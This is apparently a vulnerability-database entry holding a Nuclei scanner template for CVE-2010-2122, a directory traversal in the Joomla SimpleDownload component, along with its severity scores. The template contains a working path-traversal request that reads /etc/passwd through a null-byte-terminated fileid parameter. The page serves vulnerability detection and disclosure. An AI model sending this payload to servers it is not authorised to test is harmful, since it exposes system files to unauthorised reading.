Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2122
HistorySep 01, 2021 - 8:20 a.m.

Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval

2021-09-0108:20:47
ProjectDiscovery
github.com
3
cve2010
joomla
lfi
edb
joelrowley
directory
traversal
remote
attacker
arbitrary
file
retrieval
vulnerability

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

High

EPSS

0.018

Percentile

88.2%

A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2122

info:
  name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12623
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2122
    - https://www.exploit-db.com/exploits/12618
    - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-2122
    cwe-id: CWE-22
    epss-score: 0.01806
    epss-percentile: 0.87868
    cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joelrowley
    product: com_simpledownload
  tags: cve2010,cve,joomla,lfi,edb,joelrowley

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205817b1f254b7fb87cd0f69682290db1a8bb6187ebdfdf121e6ead47dc2d135c0022100d9b2ce8c2c9cda540a9e6893d6568d4c20c7dda27fa0dca249cb62083226c9eb:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

High

EPSS

0.018

Percentile

88.2%

Related for NUCLEI:CVE-2010-2122